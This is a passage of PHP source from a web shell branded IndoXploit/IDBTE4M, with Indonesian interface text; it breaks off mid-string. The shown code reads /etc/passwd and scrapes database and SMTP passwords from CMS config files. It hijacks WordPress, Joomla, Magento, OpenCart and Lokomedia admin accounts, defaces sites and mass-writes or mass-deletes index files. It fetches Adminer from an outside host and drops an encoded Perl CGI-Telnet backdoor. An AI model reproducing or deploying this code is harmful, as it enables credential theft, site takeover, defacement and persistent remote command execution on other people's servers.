1350 <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
1351 Deface Page: <br>
1352 <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
1353 USER: <br>
1354 <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1355 $_usercp = fopen("/etc/passwd","r");
1356 while($getu = fgets($_usercp)) {
1357 if($getu == '' || !$_usercp) {
1358 echo "<font color=red>Can't read /etc/passwd</font>";
1359 } else {
1360 preg_match_all("/(.*?):x:/", $getu, $u);
1361 foreach($u[1] as $user_cp) {
1362 if(is_dir("/home/$user_cp/public_html")) {
1363 echo "$user_cp\n";
1364 }
1365 }
1366 }
1367 }
1368 echo "</textarea><br>
1369 PASS: <br>
1370 <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1371 function cp_pass($asui) {
1372 $pass = "";
1373 $dira = scandir($asui);
1374 foreach($dira as $dirb) {
1375 if(!is_file("$dir/$dirb")) continue;
1376 $ambil = file_get_contents("$dir/$dirb");
1377 if(preg_match("/WordPress/", $ambil)) {
1378 $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1379 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1380 $pass .= ambilkata($ambil,"password = '","'")."\n";
1381 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1382 $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1383 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1384 $pass .= ambilkata($ambil,'password = "','"')."\n";
1385 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1386 $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1387 } elseif(preg_match("/client/", $ambil)) {
1388 preg_match("/password=(.*)/", $ambil, $pass1);
1389 if(preg_match('/"/', $pass1[1])) {
1390 $pass1[1] = str_replace('"', "", $pass1[1]);
1391 $pass .= $pass1[1]."\n";
1392 }
1393 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1394 $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1395 }
1396 }
1397 echo $pass;
1398 }
1399 $cp_pass = cp_pass($asui);
1400 echo $cp_pass;
1401 echo "</textarea><br>
1402 <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
1403 </form>
1404 <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1405 }
1406} elseif($_GET['idb'] == 'smtp') {
1407 echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
1408 function scj($asui) {
1409 $dira = scandir($asui);
1410 foreach($dira as $dirb) {
1411 if(!is_file("$dir/$dirb")) continue;
1412 $ambil = file_get_contents("$dir/$dirb");
1413 $ambil = str_replace("$", "", $ambil);
1414 if(preg_match("/JConfig|joomla/", $ambil)) {
1415 $smtp_host = ambilkata($ambil,"smtphost = '","'");
1416 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
1417 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
1418 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
1419 $smtp_port = ambilkata($ambil,"smtpport = '","'");
1420 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
1421 echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
1422 echo "SMTP port: <font color=lime>$smtp_port</font><br>";
1423 echo "SMTP user: <font color=lime>$smtp_user</font><br>";
1424 echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
1425 echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
1426 echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
1427 }
1428 }
1429 }
1430 $smpt_hunter = scj($asui);
1431 echo $smpt_hunter;
1432}
1433elseif($_GET['do'] == 'adminer') {
1434 $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
1435 function adminer($url, $isi) {
1436 $fp = fopen($isi, "w");
1437 $ch = curl_init();
1438 curl_setopt($ch, CURLOPT_URL, $url);
1439 curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
1440 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1441 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
1442 curl_setopt($ch, CURLOPT_FILE, $fp);
1443 return curl_exec($ch);
1444 curl_close($ch);
1445 fclose($fp);
1446 ob_flush();
1447 flush();
1448 }
1449 if(file_exists('adminer.php')) {
1450 echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1451 } else {
1452 if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
1453 echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1454 } else {
1455 echo "<center><font color=red>gagal buat file adminer</font></center>";
1456 }
1457 }
1458}
1459 elseif($_GET['idb'] == 'auto_wp') {
1460 if($_POST['hajar']) {
1461 $title = htmlspecialchars($_POST['new_title']);
1462 $pn_title = str_replace(" ", "-", $title);
1463 if($_POST['cek_edit'] == "Y") {
1464 $script = $_POST['edit_content'];
1465 } else {
1466 $script = $title;
1467 }
1468 $conf = $_POST['config_dir'];
1469 $scan_conf = scandir($conf);
1470 foreach($scan_conf as $file_conf) {
1471 if(!is_file("$conf/$file_conf")) continue;
1472 $config = file_get_contents("$conf/$file_conf");
1473 if(preg_match("/WordPress/", $config)) {
1474 $dbhost = ambilkata($config,"DB_HOST', '","'");
1475 $dbuser = ambilkata($config,"DB_USER', '","'");
1476 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1477 $dbname = ambilkata($config,"DB_NAME', '","'");
1478 $dbprefix = ambilkata($config,"table_prefix = '","'");
1479 $prefix = $dbprefix."posts";
1480 $option = $dbprefix."options";
1481 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1482 $db = mysql_select_db($dbname);
1483 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
1484 $result = mysql_fetch_array($q);
1485 $id = $result[ID];
1486 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1487 $result2 = mysql_fetch_array($q2);
1488 $target = $result2[option_value];
1489 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
1490 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
1491 echo "<div style='margin: 5px auto;'>";
1492 if($target == '') {
1493 echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
1494 } else {
1495 echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
1496 }
1497 if(!$update OR !$conn OR !$db) {
1498 echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
1499 } else {
1500 echo "<font color=lime>sukses di ganti.</font><br>";
1501 }
1502 echo "</div>";
1503 mysql_close($conn);
1504 }
1505 }
1506 } else {
1507 echo "<center>
1508 <h1>Auto Edit Title+Content WordPress</h1>
1509 <form method='post'>
1510 DIR Config: <br>
1511 <input type='text' size='50' name='config_dir' value='$asui'><br><br>
1512 Set Title: <br>
1513 <input type='text' name='new_title' value='Hacked by IDBTE4M' placeholder='New Title'><br><br>
1514 Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
1515 <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
1516 <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
1517 <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
1518 </form>
1519 <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1520 ";
1521 }
1522}elseif($_GET['idb'] == 'auto_edit_user') {
1523 if($_POST['hajar']) {
1524 if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
1525 echo "username atau password harus lebih dari 6 karakter";
1526 } else {
1527 $user_baru = $_POST['user_baru'];
1528 $pass_baru = md5($_POST['pass_baru']);
1529 $conf = $_POST['config_dir'];
1530 $scan_conf = scandir($conf);
1531 foreach($scan_conf as $file_conf) {
1532 if(!is_file("$conf/$file_conf")) continue;
1533 $config = file_get_contents("$conf/$file_conf");
1534 if(preg_match("/JConfig|joomla/",$config)) {
1535 $dbhost = ambilkata($config,"host = '","'");
1536 $dbuser = ambilkata($config,"user = '","'");
1537 $dbpass = ambilkata($config,"password = '","'");
1538 $dbname = ambilkata($config,"db = '","'");
1539 $dbprefix = ambilkata($config,"dbprefix = '","'");
1540 $prefix = $dbprefix."users";
1541 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1542 $db = mysql_select_db($dbname);
1543 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1544 $result = mysql_fetch_array($q);
1545 $id = $result['id'];
1546 $site = ambilkata($config,"sitename = '","'");
1547 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
1548 echo "Config => ".$file_conf."<br>";
1549 echo "CMS => Joomla<br>";
1550 if($site == '') {
1551 echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
1552 } else {
1553 echo "Sitename => $site<br>";
1554 }
1555 if(!$update OR !$conn OR !$db) {
1556 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1557 } else {
1558 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1559 }
1560 mysql_close($conn);
1561 } elseif(preg_match("/WordPress/",$config)) {
1562 $dbhost = ambilkata($config,"DB_HOST', '","'");
1563 $dbuser = ambilkata($config,"DB_USER', '","'");
1564 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1565 $dbname = ambilkata($config,"DB_NAME', '","'");
1566 $dbprefix = ambilkata($config,"table_prefix = '","'");
1567 $prefix = $dbprefix."users";
1568 $option = $dbprefix."options";
1569 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1570 $db = mysql_select_db($dbname);
1571 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1572 $result = mysql_fetch_array($q);
1573 $id = $result[ID];
1574 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1575 $result2 = mysql_fetch_array($q2);
1576 $target = $result2[option_value];
1577 if($target == '') {
1578 $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1579 } else {
1580 $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
1581 }
1582 $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
1583 echo "Config => ".$file_conf."<br>";
1584 echo "CMS => Wordpress<br>";
1585 echo $url_target;
1586 if(!$update OR !$conn OR !$db) {
1587 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1588 } else {
1589 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1590 }
1591 mysql_close($conn);
1592 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
1593 $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
1594 $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
1595 $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
1596 $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
1597 $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
1598 $prefix = $dbprefix."admin_user";
1599 $option = $dbprefix."core_config_data";
1600 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1601 $db = mysql_select_db($dbname);
1602 $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1603 $result = mysql_fetch_array($q);
1604 $id = $result[user_id];
1605 $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
1606 $result2 = mysql_fetch_array($q2);
1607 $target = $result2[value];
1608 if($target == '') {
1609 $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1610 } else {
1611 $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
1612 }
1613 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1614 echo "Config => ".$file_conf."<br>";
1615 echo "CMS => Magento<br>";
1616 echo $url_target;
1617 if(!$update OR !$conn OR !$db) {
1618 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1619 } else {
1620 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1621 }
1622 mysql_close($conn);
1623 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
1624 $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
1625 $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
1626 $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
1627 $dbname = ambilkata($config,"'DB_DATABASE', '","'");
1628 $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
1629 $prefix = $dbprefix."user";
1630 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1631 $db = mysql_select_db($dbname);
1632 $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1633 $result = mysql_fetch_array($q);
1634 $id = $result[user_id];
1635 $target = ambilkata($config,"HTTP_SERVER', '","'");
1636 if($target == '') {
1637 $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1638 } else {
1639 $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
1640 }
1641 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1642 echo "Config => ".$file_conf."<br>";
1643 echo "CMS => OpenCart<br>";
1644 echo $url_target;
1645 if(!$update OR !$conn OR !$db) {
1646 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1647 } else {
1648 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1649 }
1650 mysql_close($conn);
1651 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
1652 $dbhost = ambilkata($config,'server = "','"');
1653 $dbuser = ambilkata($config,'username = "','"');
1654 $dbpass = ambilkata($config,'password = "','"');
1655 $dbname = ambilkata($config,'database = "','"');
1656 $prefix = "users";
1657 $option = "identitas";
1658 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1659 $db = mysql_select_db($dbname);
1660 $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
1661 $result = mysql_fetch_array($q);
1662 $target = $result[alamat_website];
1663 if($target == '') {
1664 $target2 = $result[url];
1665 $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1666 if($target2 == '') {
1667 $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1668 } else {
1669 $cek_login3 = file_get_contents("$target2/adminweb/");
1670 $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
1671 if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
1672 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
1673 } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
1674 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
1675 } else {
1676 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1677 }
1678 }
1679 } else {
1680 $cek_login = file_get_contents("$target/adminweb/");
1681 $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
1682 if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
1683 $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
1684 } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
1685 $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
1686 } else {
1687 $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1688 }
1689 }
1690 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
1691 echo "Config => ".$file_conf."<br>";
1692 echo "CMS => Lokomedia<br>";
1693 if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
1694 echo $url_target2;
1695 } else {
1696 echo $url_target;
1697 }
1698 if(!$update OR !$conn OR !$db) {
1699 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1700 } else {
1701 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1702 }
1703 mysql_close($conn);
1704 }
1705 }
1706 }
1707 } else {
1708 echo "<center>
1709 <h1>Auto Edit User Config</h1>
1710 <form method='post'>
1711 DIR Config: <br>
1712 <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1713 Set User & Pass: <br>
1714 <input type='text' name='user_baru' value='indoxploit' placeholder='user_baru'><br>
1715 <input type='text' name='pass_baru' value='indoxploit' placeholder='pass_baru'><br>
1716 <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
1717 </form>
1718 <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1719 ";
1720 }
1721}
1722?>
1723<?php
1724if (isset($_GET['idb']) && ($_GET['idb'] == 'mass')) {
1725function sabun_massal($dir,$namafile,$isi_script) {
1726 if(is_writable($dir)) {
1727 $dira = scandir($dir);
1728 foreach($dira as $dirb) {
1729 $dirc = "$dir/$dirb";
1730 $lokasi = $dirc.'/'.$namafile;
1731 if($dirb === '.') {
1732 file_put_contents($lokasi, $isi_script);
1733 } elseif($dirb === '..') {
1734 file_put_contents($lokasi, $isi_script);
1735 } else {
1736 if(is_dir($dirc)) {
1737 if(is_writable($dirc)) {
1738 echo "[<font color=lime>DONE</font>] $lokasi<br>";
1739 file_put_contents($lokasi, $isi_script);
1740 $idx = sabun_massal($dirc,$namafile,$isi_script);
1741 }
1742 }
1743 }
1744 }
1745 }
1746 }
1747 function sabun_biasa($dir,$namafile,$isi_script) {
1748 if(is_writable($dir)) {
1749 $dira = scandir($dir);
1750 foreach($dira as $dirb) {
1751 $dirc = "$dir/$dirb";
1752 $lokasi = $dirc.'/'.$namafile;
1753 if($dirb === '.') {
1754 file_put_contents($lokasi, $isi_script);
1755 } elseif($dirb === '..') {
1756 file_put_contents($lokasi, $isi_script);
1757 } else {
1758 if(is_dir($dirc)) {
1759 if(is_writable($dirc)) {
1760 echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
1761 file_put_contents($lokasi, $isi_script);
1762 }
1763 }
1764 }
1765 }
1766 }
1767 }
1768 if($_POST['start']) {
1769 if($_POST['tipe_sabun'] == 'mahal') {
1770 echo "<div style='margin: 5px auto; padding: 5px'>";
1771 sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
1772 echo "</div>";
1773 } elseif($_POST['tipe_sabun'] == 'murah') {
1774 echo "<div style='margin: 5px auto; padding: 5px'>";
1775 sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
1776 echo "</div>";
1777 }
1778 } else {
1779 echo "<center>";
1780 echo "<form method='post'>
1781 <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
1782 <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
1783 <font style='text-decoration: underline;'>Folder:</font><br>
1784 <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
1785 <font style='text-decoration: underline;'>Filename:</font><br>
1786 <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
1787 <font style='text-decoration: underline;'>Index File:</font><br>
1788 <textarea name='script' style='width: 450px; height: 200px;'>Hacked by IndoXploit</textarea><br>
1789 <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
1790 </form></center>";
1791 }
1792} elseif($_GET['do'] == 'mass_delete') {
1793 function hapus_massal($dir,$namafile) {
1794 if(is_writable($dir)) {
1795 $dira = scandir($dir);
1796 foreach($dira as $dirb) {
1797 $dirc = "$dir/$dirb";
1798 $lokasi = $dirc.'/'.$namafile;
1799 if($dirb === '.') {
1800 if(file_exists("$dir/$namafile")) {
1801 unlink("$dir/$namafile");
1802 }
1803 } elseif($dirb === '..') {
1804 if(file_exists("".dirname($dir)."/$namafile")) {
1805 unlink("".dirname($dir)."/$namafile");
1806 }
1807 } else {
1808 if(is_dir($dirc)) {
1809 if(is_writable($dirc)) {
1810 if(file_exists($lokasi)) {
1811 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
1812 unlink($lokasi);
1813 $idx = hapus_massal($dirc,$namafile);
1814 }
1815 }
1816 }
1817 }
1818 }
1819 }
1820 }
1821 if($_POST['start']) {
1822 echo "<div style='margin: 5px auto; padding: 5px'>";
1823 hapus_massal($_POST['d_dir'], $_POST['d_file']);
1824 echo "</div>";
1825 } else {
1826 echo "<center>";
1827 echo "<form method='post'>
1828 <font style='text-decoration: underline;'>Folder:</font><br>
1829 <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
1830 <font style='text-decoration: underline;'>Filename:</font><br>
1831 <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
1832 <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
1833 </form></center>";
1834 }
1835}
1836?>
1837<?php
1838if(isset($_GET['idb']) && $_GET['idb'] == 'cgi'){
1839mkdir('~_~', 0777);
1840chdir('~_~');
1841$kokdosya = ".htaccess";
1842$dosya_adi = "$kokdosya";
1843$dosya = fopen ($dosya_adi , 'w') or die ("Dosya açılamadı!");
1844$metin = "AddType application/x-httpd-cgi .te4m
1845AddType application/x-httpd-cgi .te4m
1846
1847AddHandler cgi-script .te4m
1848AddHandler cgi-script .te4m";
1849fwrite ( $dosya , $metin ) ;
1850fclose ($dosya);
1851$cgi4e = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQp1c2UgTUlNRTo6QmFzZTY0Ow0KJFZlcnNpb249ICJDR0ktVGVsbmV0IFJlY29kZSBCeSBJREJURTRNIjsNCiRFZGl0UGVyc2lvbj0iSURCVEU0TSI7DQoNCiRQYXNzd29yZCA9ICJqYW5jb2siOw0Kc3ViIElzX1dpbigpew0KCSRvcyA9ICZ0cmltKCRFTlZ7IlNFUlZFUl9TT0ZUV0FSRSJ9KTsNCglpZigkb3MgPX4gbS93aW4vaSl7DQoJCXJldHVybiAxOw0KCX1lbHNlew0KCQlyZXR1cm4gMDsNCgl9DQp9DQokV2luTlQgPSAmSXNfV2luKCk7CQ0KDQokTlRDbWRTZXAgPSAiJiI7CQ0KDQokVW5peENtZFNlcCA9ICI7IjsNCg0KJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gPSAxMDsNCg0KJFNob3dEeW5hbWljT3V0cHV0ID0gMTsJDQoNCiMgRE9OJ1QgQ0hBTkdFIEFOWVRISU5HIEJFTE9XIFRISVMgTElORSBVTkxFU1MgWU9VIEtOT1cgV0hBVCBZT1UnUkUgRE9JTkcgISENCg0KJENtZFNlcCA9ICgkV2luTlQgPyAkTlRDbWRTZXAgOiAkVW5peENtZFNlcCk7DQokQ21kUHdkID0gKCRXaW5OVCA/ICJjZCIgOiAicHdkIik7DQokUGF0aFNlcCA9ICgkV2luTlQgPyAiXFwiIDogIi8iKTsNCiRSZWRpcmVjdG9yID0gKCRXaW5OVCA/ICIgMj4mMSAxPiYyIiA6ICIgMT4mMSAyPiYxIik7DQokY29scz0gMTMwOw0KJHJvd3M9IDI2Ow0KDQpzdWIgUmVhZFBhcnNlIA0Kew0KCWxvY2FsICgqaW4pID0gQF8gaWYgQF87DQoJbG9jYWwgKCRpLCAkbG9jLCAka2V5LCAkdmFsKTsNCgkkTXVsdGlwYXJ0Rm9ybURhdGEgPSAkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLzsNCglpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJHRVQiKQ0KCXsNCgkJJGluID0gJEVOVnsnUVVFUllfU1RSSU5HJ307DQoJfQ0KCWVsc2lmKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgIlBPU1QiKQ0KCXsNCgkJYmlubW9kZShTVERJTikgaWYgJE11bHRpcGFydEZvcm1EYXRhICYgJFdpbk5UOw0KCQlyZWFkKFNURElOLCAkaW4sICRFTlZ7J0NPTlRFTlRfTEVOR1RIJ30pOw0KCX0NCgkjIGhhbmRsZSBmaWxlIHVwbG9hZCBkYXRhDQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBib3VuZGFyeT0oLispJC8pDQoJew0KCQkkQm91bmRhcnkgPSAnLS0nLiQxOyAjIHBsZWFzZSByZWZlciB0byBSRkMxODY3IA0KCQlAbGlzdCA9IHNwbGl0KC8kQm91bmRhcnkvLCAkaW4pOyANCgkJJEhlYWRlckJvZHkgPSAkbGlzdFsxXTsNCgkJJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOw0KCQkkSGVhZGVyID0gJGA7DQoJCSRCb2R5ID0gJCc7DQogCQkkQm9keSA9fiBzL1xyXG4kLy87ICMgdGhlIGxhc3QgXHJcbiB3YXMgcHV0IGluIGJ5IE5ldHNjYXBlDQoJCSRpbnsnZmlsZWRhdGEnfSA9ICRCb2R5Ow0KCQkkSGVhZGVyID1+IC9maWxlbmFtZT1cIiguKylcIi87IA0KCQkkaW57J2YnfSA9ICQxOyANCgkJJGlueydmJ30gPX4gcy9cIi8vZzsNCgkJJGlueydmJ30gPX4gcy9ccy8vZzsNCg0KCQkjIHBhcnNlIHRyYWlsZXINCgkJZm9yKCRpPTI7ICRsaXN0WyRpXTsgJGkrKykNCgkJeyANCgkJCSRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOw0KCQkJJGxpc3RbJGldID1+IC9cIihcdyspXCIvOw0KCQkJJGtleSA9ICQxOw0KCQkJJHZhbCA9ICQnOw0KCQkJJHZhbCA9fiBzLyheKFxyXG5cclxufFxuXG4pKXwoXHJcbiR8XG4kKS8vZzsNCgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkaW57JGtleX0gPSAkdmFsOyANCgkJfQ0KCX0NCgllbHNlICMgc3RhbmRhcmQgcG9zdCBkYXRhICh1cmwgZW5jb2RlZCwgbm90IG11bHRpcGFydCkNCgl7DQoJCUBpbiA9IHNwbGl0KC8mLywgJGluKTsNCgkJZm9yZWFjaCAkaSAoMCAuLiAkI2luKQ0KCQl7DQoJCQkkaW5bJGldID1+IHMvXCsvIC9nOw0KCQkJKCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTsNCgkJCSRrZXkgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkdmFsID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOw0KCQkJJGlueyRrZXl9IC49ICIiIGlmIChkZWZpbmVkKCRpbnska2V5fSkpOw0KCQkJJGlueyRrZXl9IC49ICR2YWw7DQoJCX0NCgl9DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIGZ1bmN0aW9uIEVuY29kZURpcjogZW5jb2RlIGJhc2U2NCBQYXRoDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgRW5jb2RlRGlyDQp7DQoJbXkgJGRpciA9IHNoaWZ0Ow0KCSRkaXIgPSB0cmltKGVuY29kZV9iYXNlNjQoJGRpcikpOw0KCSRkaXIgPX4gcy8oXHJ8XG4pLy87DQoJcmV0dXJuICRkaXI7DQp9DQoNCnN1YiBQcmludFBhZ2VIZWFkZXINCnsNCgkkRW5jb2RlQ3VycmVudERpciA9IEVuY29kZURpcigkQ3VycmVudERpcik7DQoJbXkgJGlkID0gYGlkYCBpZighJFdpbk5UKTsNCglteSAkaW5mbyA9IGB1bmFtZSAtcyAtbiAtciAtaWA7DQoJcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7DQoJcHJpbnQgPDxFTkQ7DQo8aHRtbD4NCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iY29udGVudC10eXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9VVRGLTgiPg0KPHRpdGxlPlsgJFZlcnNpb24gXTwvdGl0bGU+DQokSHRtbE1ldGFIZWFkZXINCjwvaGVhZD4NCjxzdHlsZT4NCmJvZHl7DQpmb250OiAxMHB0IFZlcmRhbmE7DQpjb2xvcjogI2ZmZjsNCn0NCnRyLHRkLHRhYmxlL